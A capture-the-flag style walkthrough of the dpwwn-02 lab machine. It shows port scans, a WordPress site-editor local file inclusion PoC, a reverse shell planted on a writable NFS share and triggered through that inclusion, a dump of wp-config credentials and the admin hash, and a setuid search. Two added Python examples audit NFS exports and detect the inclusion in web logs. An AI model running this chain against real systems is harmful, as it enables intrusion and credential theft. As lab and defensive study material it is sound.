DPWWN_2 Target Machine


Information Gathering

┌──(kali㉿kali)-[~]
└─$ sudo nmap --min-rate 10000 -p- 10.10.10.10
Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-28 22:59 EDT
Nmap scan report for 10.10.10.10
Host is up (0.00053s latency).
Not shown: 65527 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
111/tcp open rpcbind
443/tcp open https
2049/tcp open nfs
40933/tcp open unknown
42973/tcp open unknown
44923/tcp open unknown
48347/tcp open unknown
MAC Address: 00:0C:29:61:24:B2 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 7.87 seconds
┌──(kali㉿kali)-[/tmp]
└─$ sudo nmap --top-ports 20 -sU 10.10.10.10
[sudo] password for kali:
Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-28 23:27 EDT
Nmap scan report for 10.10.10.10
Host is up (0.00032s latency).

PORT STATE SERVICE
53/udp closed domain
67/udp closed dhcps
68/udp closed dhcpc
69/udp closed tftp
123/udp closed ntp
135/udp closed msrpc
137/udp closed netbios-ns
138/udp closed netbios-dgm
139/udp closed netbios-ssn
161/udp closed snmp
162/udp closed snmptrap
445/udp closed microsoft-ds
500/udp closed isakmp
514/udp closed syslog
520/udp closed route
631/udp closed ipp
1434/udp closed ms-sql-m
1900/udp closed upnp
4500/udp closed nat-t-ike
49152/udp closed unknown
MAC Address: 00:0C:29:61:24:B2 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 23.63 seconds

Ports 80, 111, 443, 2049, 40933, 42973, 44923 and 48347 are open; port 22 is not.

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sT -sV -sC -O -p80,111,443,2049,40933,42973,44923,48347 10.10.10.10
Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-28 23:01 EDT
Nmap scan report for 10.10.10.10
Host is up (0.00038s latency).

PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.38 ((Ubuntu))
|_http-title: dpwwn-02
|_http-server-header: Apache/2.4.38 (Ubuntu)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 3 2049/udp nfs
| 100003 3 2049/udp6 nfs
| 100003 3,4 2049/tcp nfs
| 100003 3,4 2049/tcp6 nfs
| 100005 1,2,3 34176/udp mountd
| 100005 1,2,3 34527/udp6 mountd
| 100005 1,2,3 42973/tcp mountd
| 100005 1,2,3 59857/tcp6 mountd
| 100021 1,3,4 37005/tcp6 nlockmgr
| 100021 1,3,4 40564/udp6 nlockmgr
| 100021 1,3,4 40933/tcp nlockmgr
| 100021 1,3,4 41906/udp nlockmgr
| 100227 3 2049/tcp nfs_acl
| 100227 3 2049/tcp6 nfs_acl
| 100227 3 2049/udp nfs_acl
|_ 100227 3 2049/udp6 nfs_acl
443/tcp open http Apache httpd 2.4.38 ((Ubuntu))
|_http-title: dpwwn-02
|_http-server-header: Apache/2.4.38 (Ubuntu)
2049/tcp open nfs 3-4 (RPC #100003)
40933/tcp open nlockmgr 1-4 (RPC #100021)
42973/tcp open mountd 1-3 (RPC #100005)
44923/tcp open mountd 1-3 (RPC #100005)
48347/tcp open mountd 1-3 (RPC #100005)
MAC Address: 00:0C:29:61:24:B2 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.37 seconds

The five-digit ports are all RPC services, so the focus goes on 80, 443 and 2049.

┌──(kali㉿kali)-[~]
└─$ sudo nmap --script=vuln -p80,111,443,2049,40933,42973,44923,48347 10.10.10.10
[sudo] password for kali:
Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-28 23:26 EDT
Nmap scan report for 10.10.10.10
Host is up (0.00044s latency).

PORT STATE SERVICE
80/tcp open http
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| http-enum:
| /wordpress/: Blog
|_ /wordpress/wp-login.php: Wordpress login page.
111/tcp open rpcbind
443/tcp open https
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_ssl-ccs-injection: No reply from server (TIMEOUT)
| http-enum:
| /wordpress/: Blog
|_ /wordpress/wp-login.php: Wordpress login page.
2049/tcp open nfs
40933/tcp open unknown
42973/tcp open unknown
44923/tcp open unknown
48347/tcp open unknown
MAC Address: 00:0C:29:61:24:B2 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 82.97 seconds

The vuln-script scan reveals a /wordpress/ directory, and the results for ports 80 and 443 are identical, so both ports presumably serve the same web application. First mount the NFS share, then run wpscan.

NFS mount

┌──(kali㉿kali)-[~]
└─$ showmount -e 10.10.10.10
Export list for 10.10.10.10:
/home/dpwwn02 (everyone)

┌──(kali㉿kali)-[~]
└─$ mkdir /tmp/infosec

┌──(kali㉿kali)-[~]
└─$ sudo mount -t nfs 10.10.10.10:/home/dpwwn02 /tmp/infosec

The mount succeeded; let's take a look inside.

┌──(kali㉿kali)-[/tmp/infosec]
└─$ ls -liah
total 16K
405869 drwxr-xr-x 2 nobody nogroup 4.0K Aug 8 2019 .
4194305 drwxrwxrwt 17 root root 12K Jun 28 23:05 ..

Empty? Set it aside for now. I recalled cases where you could create .ssh under the home directory and drop a public key in it, but port 22 is not open here. Never mind; let's see what wpscan says.

┌──(kali㉿kali)-[~]
└─$ wpscan --url http://10.10.10.10/wordpress -eap
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | _ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|

WordPress Security Scanner by the WPScan Team
Version 3.8.24
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]n
[+] URL: http://10.10.10.10/wordpress/ [10.10.10.10]
[+] Started: Thu Jun 29 01:45:09 2023

Interesting Finding(s):

[+] Headers
| Interesting Entry: Server: Apache/2.4.38 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%

[+] XML-RPC seems to be enabled: http://10.10.10.10/wordpress/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://10.10.10.10/wordpress/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%

[+] Upload directory has listing enabled: http://10.10.10.10/wordpress/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://10.10.10.10/wordpress/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.2.2 identified (Insecure, released on 2019-06-18).
| Found By: Rss Generator (Passive Detection)
| - http://10.10.10.10/wordpress/index.php/feed/, <generator>https://wordpress.org/?v=5.2.2</generator>
| - http://10.10.10.10/wordpress/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.2.2</generator>

[+] WordPress theme in use: twentynineteen
| Location: http://10.10.10.10/wordpress/wp-content/themes/twentynineteen/
| Last Updated: 2023-03-29T00:00:00.000Z
| Readme: http://10.10.10.10/wordpress/wp-content/themes/twentynineteen/readme.txt
| [!] The version is out of date, the latest version is 2.5
| Style URL: http://10.10.10.10/wordpress/wp-content/themes/twentynineteen/style.css?ver=1.4
| Style Name: Twenty Nineteen
| Style URI: https://wordpress.org/themes/twentynineteen/
| Description: Our 2019 default theme is designed to show off the power of the block editor. It features custom sty...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.4 (80% confidence)
| Found By: Style (Passive Detection)
| - http://10.10.10.10/wordpress/wp-content/themes/twentynineteen/style.css?ver=1.4, Match: 'Version: 1.4'

[+] Enumerating All Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] site-editor
| Location: http://10.10.10.10/wordpress/wp-content/plugins/site-editor/
| Latest Version: 1.1.1 (up to date)
| Last Updated: 2017-05-02T23:34:00.000Z
|
| Found By: Urls In Homepage (Passive Detection)
|
| Version: 1.1.1 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://10.10.10.10/wordpress/wp-content/plugins/site-editor/readme.txt

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Thu Jun 29 01:45:14 2023
[+] Requests Done: 33
[+] Cached Requests: 5
[+] Data Sent: 8.53 KB
[+] Data Received: 484.481 KB
[+] Memory used: 241.328 MB
[+] Elapsed time: 00:00:04

Among the plugins there is site-editor; searching for "wordpress site-editor" turns up a local file inclusion vulnerability on Exploit-DB.

http://<host>/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd

Local file inclusion

Verify it using the PoC above.

Next I tried to access wp-config.php, but the PHP file appears to be parsed rather than returned, so an error comes back.

Next I tried brute-forcing the login directly and searched for WordPress 5.2 and 5.2.2 vulnerabilities. After ten-odd minutes of brute-forcing with no success, it seemed unlikely that brute force alone would recover the password. I thought about this for a long time; only after looking back at the WP findings did I realise that all it takes is to write a PHP file into the NFS-mounted directory and then request it through the local file inclusion. My previous box attempts leaned on a single vulnerability to get a shell; this one is a reminder to watch how different vulnerabilities or access paths chain together, because getting a shell is a combined process.

┌──(kali㉿kali)-[~/Downloads/dpwwn02]
└─$ vim php-reverse-shell.php

Edit the reverse shell, then copy it into the mounted directory.

┌──(root㉿kali)-[/tmp/infosec]
└─# cp /home/kali/Downloads/dpwwn02/php-reverse-shell.php ./

┌──(root㉿kali)-[/tmp/infosec]
└─# ls
php-reverse-shell.php

┌──(root㉿kali)-[/tmp/infosec]
└─# ls -liah
total 20K
405869 drwxr-xr-x 2 nobody nogroup 4.0K Jun 29 03:25 .
4194305 drwxrwxrwt 18 root root 12K Jun 29 03:09 ..
407201 -rwxr-xr-x 1 nobody nogroup 3.4K Jun 29 03:25 php-reverse-shell.php
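The export seen via showmount is offered to every host and is writable; root_squash is evidently on (the copied file lands as nobody:nogroup), but that only changes the owner and does nothing to stop the include that follows. The following added example (mine, not from the writeup) audits /etc/exports entries for exactly those conditions; the sample exports file is constructed, with the first line mirroring this box's share and the other two invented for contrast.

```python
import re

# Constructed sample of /etc/exports. The first line reproduces the export seen
# via showmount on this box (/home/dpwwn02 offered to everyone, read-write).
SAMPLE_EXPORTS = """\
# /etc/exports (constructed sample)
/home/dpwwn02  *(rw,sync,no_subtree_check)
/srv/backup    10.10.10.0/24(ro,sync,root_squash)
/srv/build     10.10.10.50(rw,no_root_squash,insecure)
"""

# host(options) -- the host part may be empty, the option list may be absent
CLAUSE_RE = re.compile(r"([^(]*)(?:\((.*)\))?")


def parse_exports(text):
    """Yield (path, client, options) for every client clause of every export."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and blank lines
        if not line:
            continue
        path, *clauses = line.split()
        for clause in clauses:
            m = CLAUSE_RE.fullmatch(clause)
            client = m.group(1) or "*"       # "(rw)" with no host means everyone
            opts = set(filter(None, (m.group(2) or "").split(",")))
            yield path, client, opts


def audit_exports(text):
    """Return [(path, client, [issue, ...])] for exports that deserve a look."""
    findings = []
    for path, client, opts in parse_exports(text):
        issues = []
        if client == "*":
            issues.append("exported to every host")
        if "rw" in opts:
            # A writable share lets any allowed client plant files; root_squash
            # only maps the owner to nobody, it does not prevent the write.
            issues.append("writable by clients")
            if "no_root_squash" in opts:
                issues.append("no_root_squash: client root is root on the server")
        if "insecure" in opts:
            issues.append("insecure: requests accepted from unprivileged ports")
        if issues:
            findings.append((path, client, issues))
    return findings


if __name__ == "__main__":
    for path, client, issues in audit_exports(SAMPLE_EXPORTS):
        print(f"{path} -> {client}: {'; '.join(issues)}")
```

Restricting the client list to specific hosts and exporting read-only where possible removes the foothold this writeup relies on.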

Local file inclusion + file upload getshell

Start the listener in advance, then request the file through the local file inclusion; the shell comes back.

┌──(kali㉿kali)-[~]
└─$ sudo nc -lvnp 443
[sudo] password for kali:
listening on [any] 443 ...
connect to [10.10.10.128] from (UNKNOWN) [10.10.10.10] 50768
Linux dpwwn-02 5.0.0-23-generic #24-Ubuntu SMP Mon Jul 29 15:36:44 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
07:26:38 up 4:31, 0 users, load average: 1.51, 14.28, 13.10
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ uname -a
Linux dpwwn-02 5.0.0-23-generic #24-Ubuntu SMP Mon Jul 29 15:36:44 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 00:0c:29:61:24:b2 brd ff:ff:ff:ff:ff:ff
inet 10.10.10.10/24 brd 10.10.10.255 scope global ens33
valid_lft forever preferred_lft forever
inet6 fe80::20c:29ff:fe61:24b2/64 scope link
valid_lft forever preferred_lft forever
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ python -c "import pty;pty.spawn('/bin/bash')"
www-data@dpwwn-02:/$ export TERM=xterm-color
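On the defending side, the chain above leaves a clear trace in the web server log: requests to the site-editor endpoint whose ajax_path names an absolute path, a traversal sequence, a stream wrapper, or a file under the NFS export. The following added example (not from the original writeup) scans constructed Apache access-log lines for those patterns; the export path /home/dpwwn02 comes from the showmount output above, and the log lines are made up to mirror the requests in this writeup.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed Apache combined-log lines. Lines 1, 2 and 4 mirror the requests
# made in this writeup (PoC read of /etc/passwd, include of the file planted on
# the NFS export, attempt on wp-config.php); line 3 is ordinary traffic.
SAMPLE_LOG = """\
10.10.10.128 - - [29/Jun/2023:03:10:01 +0000] "GET /wordpress/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd HTTP/1.1" 200 2123 "-" "Mozilla/5.0"
10.10.10.128 - - [29/Jun/2023:03:26:12 +0000] "GET /wordpress/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/home/dpwwn02/php-reverse-shell.php HTTP/1.1" 200 17 "-" "curl/7.88.1"
10.10.10.128 - - [29/Jun/2023:03:27:40 +0000] "GET /wordpress/index.php/feed/ HTTP/1.1" 200 4012 "-" "Mozilla/5.0"
10.10.10.128 - - [29/Jun/2023:03:28:05 +0000] "GET /wordpress/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=..%2F..%2F..%2Fwp-config.php HTTP/1.1" 500 0 "-" "curl/7.88.1"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)
VULN_SCRIPT = "ajax_shortcode_pattern.php"   # the site-editor endpoint
INCLUDE_PARAM = "ajax_path"                   # the parameter that gets included
NFS_EXPORTS = ("/home/dpwwn02/",)             # shares remote clients can write to


def classify_include_path(value):
    """Reason a requested include path is suspicious, or None if it looks benign."""
    p = unquote(value)
    if any(p.startswith(e) for e in NFS_EXPORTS):
        return "include from NFS export"      # attacker-controlled file on disk
    if p.startswith("/"):
        return "absolute path"                # reads outside the plugin directory
    if ".." in p.split("/"):
        return "directory traversal"
    if "://" in p or p.startswith("php:"):
        return "stream wrapper"
    return None


def scan_log(text):
    """Return one finding per suspicious ajax_path value seen in the log."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        if not url.path.endswith(VULN_SCRIPT):
            continue
        # parse_qs already percent-decodes, so "..%2F" shows up as "../"
        for value in parse_qs(url.query).get(INCLUDE_PARAM, []):
            reason = classify_include_path(value)
            if reason:
                findings.append({
                    "ip": m["ip"], "time": m["ts"], "status": int(m["status"]),
                    "path": unquote(value), "reason": reason,
                })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']} {f['status']} {f['reason']}: {f['path']}")
```

A 200 on an "include from NFS export" hit is the moment the planted file ran; the 500 on the wp-config.php attempt matches the parse error the writeup describes.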

Privilege escalation

The wp-config file

Let's look at the wp-config file.

www-data@dpwwn-02:/$ cd /var/www
cd /var/www
www-data@dpwwn-02:/var/www$ ls -liah
ls -liah
total 12K
268303 drwxr-xr-x 3 root root 4.0K Aug 7 2019 .
16386 drwxr-xr-x 14 root root 4.0K Aug 7 2019 ..
268305 drwxr-xr-x 3 root root 4.0K Aug 8 2019 html
www-data@dpwwn-02:/var/www$ cd html
cd html
www-data@dpwwn-02:/var/www/html$ ls -liah
ls -liah
total 28K
268305 drwxr-xr-x 3 root root 4.0K Aug 8 2019 .
268303 drwxr-xr-x 3 root root 4.0K Aug 7 2019 ..
268311 -r-------- 1 root root 11K Aug 7 2019 index.html
281706 -rw-r--r-- 1 root root 184 Aug 8 2019 index.php
268687 drwxr-xr-x 5 www-data www-data 4.0K Aug 7 2019 wordpress
www-data@dpwwn-02:/var/www/html$ cd wordpress
cd wordpress
www-data@dpwwn-02:/var/www/html/wordpress$ ls -alih
ls -alih
total 216K
268687 drwxr-xr-x 5 www-data www-data 4.0K Aug 7 2019 .
268305 drwxr-xr-x 3 root root 4.0K Aug 8 2019 ..
280668 -rwxr-xr-x 1 www-data www-data 256 Aug 7 2019 .htaccess
268703 -rwxr-xr-x 1 www-data www-data 420 Nov 30 2017 index.php
269532 -rwxr-xr-x 1 www-data www-data 20K Jan 1 2019 license.txt
268699 -rwxr-xr-x 1 www-data www-data 7.3K Apr 8 2019 readme.html
269761 -rwxr-xr-x 1 www-data www-data 6.8K Jan 12 2019 wp-activate.php
269762 drwxr-xr-x 9 www-data www-data 4.0K Jun 18 2019 wp-admin
268697 -rwxr-xr-x 1 www-data www-data 369 Nov 30 2017 wp-blog-header.php
280653 -rwxr-xr-x 1 www-data www-data 2.3K Jan 21 2019 wp-comments-post.php
268707 -rwxr-xr-x 1 www-data www-data 2.9K Jan 8 2019 wp-config-sample.php
280667 -rwxr-xr-x 1 www-data www-data 3.2K Aug 7 2019 wp-config.php
269533 drwxr-xr-x 6 www-data www-data 4.0K Jun 29 07:16 wp-content
268705 -rwxr-xr-x 1 www-data www-data 3.8K Jan 9 2019 wp-cron.php
533945 drwxr-xr-x 20 www-data www-data 12K Jun 18 2019 wp-includes
269759 -rwxr-xr-x 1 www-data www-data 2.5K Jan 16 2019 wp-links-opml.php
269760 -rwxr-xr-x 1 www-data www-data 3.3K Nov 30 2017 wp-load.php
268709 -rwxr-xr-x 1 www-data www-data 39K Jun 10 2019 wp-login.php
269758 -rwxr-xr-x 1 www-data www-data 8.3K Nov 30 2017 wp-mail.php
269505 -rwxr-xr-x 1 www-data www-data 19K Mar 28 2019 wp-settings.php
268701 -rwxr-xr-x 1 www-data www-data 31K Jan 16 2019 wp-signup.php
280652 -rwxr-xr-x 1 www-data www-data 4.7K Nov 30 2017 wp-trackback.php
268693 -rwxr-xr-x 1 www-data www-data 3.0K Aug 17 2018 xmlrpc.php
www-data@dpwwn-02:/var/www/html/wordpress$ cat wp-config.php
cat wp-config.php
<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the
* installation. You don't have to use the web site, you can
* copy this file to "wp-config.php" and fill in the values.
*
* This file contains the following configurations:
*
* * MySQL settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://codex.wordpress.org/Editing_wp-config.php
*
* @package WordPress
*/

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'dpwwn02' );

/** MySQL database username */
define( 'DB_USER', 'wpuser' );

/** MySQL database password */
define( 'DB_PASSWORD', 'wp$%bd(*&u$)rJmKa' );

/** MySQL hostname */
define( 'DB_HOST', 'localhost' );

/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );

/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

/**#@+
* Authentication Unique Keys and Salts.
*
* Change these to different unique phrases!
* You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
* You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
*
* @since 2.6.0
*/
define( 'AUTH_KEY', 'tppc%]*HG>YdA%WexT&5+03</`+<ddzoOFNt/`^c@4N5<f;++(3(7+gb(}3W1^je' );
define( 'SECURE_AUTH_KEY', '7B:6=Yxs+?;>,Nzo0RzUC_0H9@+Afbr+w~k<;m#IiqkzMzz[iac7[>=SfSN+Kf+K' );
define( 'LOGGED_IN_KEY', '8]UL$#O2owarV?r7{v!#]YJeJVh]thhdp_U)QQRJcs%JhR}#vo(7*(9bJ~K%WYzY' );
define( 'NONCE_KEY', '<Q3xN0jUeAS|>lM9qroI0H^([L]oJVG7c+%r`qH)oq:hwh+&dP,xQ4[H_xr(]VBY' );
define( 'AUTH_SALT', '}n57d s@&5*~WiN|`&wv&uMs9(REUg>n!(2mC}0r[#NW{O=[E&Ml0tmc!{1uCk~+' );
define( 'SECURE_AUTH_SALT', 'P(|TAVr[ p1@<bfV50SSL13Dof`Fj+ZyF#<:Ppu[(,{hv1q<@#tXMJ-KawIg~Voy' );
define( 'LOGGED_IN_SALT', '8c *i~o;jB,[YmV4WligV}zE@1G5XHNR@m{U.#j TQgIUA)Mi_fc+js5O@%IWd}f' );
define( 'NONCE_SALT', 'K_b9JPi0B$HAj!Uig}Mu[![kC.W!]c%3>JE*=})kRN*AK%qjcSTfy|xu.N|;AzAJ' );

/**#@-*/

/**
* WordPress Database Table prefix.
*
* You can have multiple installations in one database if you give each
* a unique prefix. Only numbers, letters, and underscores please!
*/
$table_prefix = 'wp_';

/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*
* For information on other constants that can be used for debugging,
* visit the Codex.
*
* @link https://codex.wordpress.org/Debugging_in_WordPress
*/
define( 'WP_DEBUG', false );

/* That's all, stop editing! Happy publishing. */

/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
define( 'ABSPATH', dirname( __FILE__ ) . '/' );
}

/** Sets up WordPress vars and included files. */
require_once( ABSPATH . 'wp-settings.php' );
@ini_set('upload_max_size' , '256M' );

That yields a password, wp$%bd(*&u$)rJmKa, and the database user is wpuser. Let's go into the database.

www-data@dpwwn-02:/var/www/html/wordpress$ mysql -u wpuser -p
mysql -u wpuser -p
Enter password: wp$%bd(*&u$)rJmKa

Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 219596
Server version: 5.7.27-0ubuntu0.19.04.1 (Ubuntu)

Copyright (c) 2000, 2019, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> show databases;
show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| dpwwn02 |
+--------------------+
2 rows in set (0.00 sec)

mysql> use dpwwn02
use dpwwn02
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
show tables;
+-----------------------+
| Tables_in_dpwwn02 |
+-----------------------+
| wp_commentmeta |
| wp_comments |
| wp_links |
| wp_options |
| wp_postmeta |
| wp_posts |
| wp_term_relationships |
| wp_term_taxonomy |
| wp_termmeta |
| wp_terms |
| wp_usermeta |
| wp_users |
+-----------------------+
12 rows in set (0.00 sec)

mysql> select * from wp_users;
select * from wp_users;
+----+------------+------------------------------------+---------------+------------------------+----------+---------------------+---------------------+-------------+--------------+
| ID | user_login | user_pass | user_nicename | user_email | user_url | user_registered | user_activation_key | user_status | display_name |
+----+------------+------------------------------------+---------------+------------------------+----------+---------------------+---------------------+-------------+--------------+
| 1 | admin | $P$BPdPCvh2zdEdcnDqH7f9kpWjCeOYxm. | admin | dpwwn-02@dpwwn-02.test | | 2019-08-07 08:10:32 | | 0 | admin |
+----+------------+------------------------------------+---------------+------------------------+----------+---------------------+---------------------+-------------+--------------+
1 row in set (0.00 sec)

The database has only one user, admin, whose password is stored as a salted MD5-based (phpass $P$) hash; looking it up on an online site failed.

Information gathering and checking scheduled tasks

Let's check the scheduled tasks. I already tried this earlier through the file inclusion, so I'll just paste the screenshot here.

Do some information gathering, then look for files with the s (setuid) bit.

www-data@dpwwn-02:/home$ cd rootadmin
cd rootadmin
www-data@dpwwn-02:/home/rootadmin$ ls -laih
ls -laih
total 52K
405523 drwxr-xr-x 4 rootadmin rootadmin 4.0K Aug 8 2019 .
393218 drwxr-xr-x 4 root root 4.0K Aug 8 2019 ..
407110 -rw------- 1 root root 6 Aug 8 2019 .bash_history
405525 -rw-r--r-- 1 rootadmin rootadmin 220 Apr 4 2019 .bash_logout
405524 -rw-r--r-- 1 rootadmin rootadmin 3.7K Apr 4 2019 .bashrc
531299 drwx------ 2 rootadmin rootadmin 4.0K Aug 7 2019 .cache
531301 drwx------ 3 rootadmin rootadmin 4.0K Aug 7 2019 .gnupg
407111 -rw------- 1 root root 1 Aug 8 2019 .mysql_history
405526 -rw-r--r-- 1 rootadmin rootadmin 807 Apr 4 2019 .profile
405573 -rw-r--r-- 1 rootadmin rootadmin 1 Aug 8 2019 .sudo_as_admin_successful
407199 -rw------- 1 root root 12K Aug 8 2019 .viminfo
www-data@dpwwn-02:/home/rootadmin$ cat .sudo_as_admin_successful
cat .sudo_as_admin_successful

www-data@dpwwn-02:/home/rootadmin$ find / -type f -perm -04000 -ls 2>/dev/null
find / -type f -perm -04000 -ls 2>/dev/null
656 36 -rwsr-xr-x 1 root root 34896 Mar 5 2019 /usr/bin/fusermount
839 64 -rwsr-xr-x 1 root root 63736 Mar 22 2019 /usr/bin/passwd
551 44 -rwsr-xr-x 1 root root 44528 Mar 22 2019 /usr/bin/chsh
1120 36 -rwsr-xr-x 1 root root 34888 Feb 22 2019 /usr/bin/umount
648 312 -rwsr-xr-x 1 root root 315904 Feb 16 2019 /usr/bin/find
1051 156 -rwsr-xr-x 1 root root 157192 Feb 19 2019 /usr/bin/sudo
792 48 -rwsr-xr-x 1 root root 47184 Feb 22 2019 /usr/bin/mount
479 56 -rwsr-sr-x 1 daemon daemon 55560 Nov 12 2018 /usr/bin/at
545 80 -rwsr-xr-x 1 root root 80592 Mar 22 2019 /usr/bin/chfn
1050 64 -rwsr-xr-x 1 root root 63568 Feb 22 2019 /usr/bin/su
807 44 -rwsr-xr-x 1 root root 44440 Mar 22 2019 /usr/bin/newgrp
666 84 -rwsr-xr-x 1 root root 84016 Mar 22 2019 /usr/bin/gpasswd
7517 108 -rwsr-sr-x 1 root root 109432 Mar 21 2019 /usr/lib/snapd/snap-confine
1335 12 -rwsr-xr-x 1 root root 10232 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
1548 428 -rwsr-xr-x 1 root root 436552 Apr 8 2019 /usr/lib/openssh/ssh-keysign
4238 52 -rwsr-xr-- 1 root messagebus 51184 Jun 10 2019 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
12428 120 -rwsr-xr-x 1 root root 121528 Apr 1 2019 /usr/sbin/mount.nfs
66 40 -rwsr-xr-x 1 root root 40152 May 16 2018 /snap/core/6673/bin/mount
80 44 -rwsr-xr-x 1 root root 44168 May 7 2014 /snap/core/6673/bin/ping
81 44 -rwsr-xr-x 1 root root 44680 May 7 2014 /snap/core/6673/bin/ping6
98 40 -rwsr-xr-x 1 root root 40128 May 17 2017 /snap/core/6673/bin/su
116 27 -rwsr-xr-x 1 root root 27608 May 16 2018 /snap/core/6673/bin/umount
2657 71 -rwsr-xr-x 1 root root 71824 May 17 2017 /snap/core/6673/usr/bin/chfn
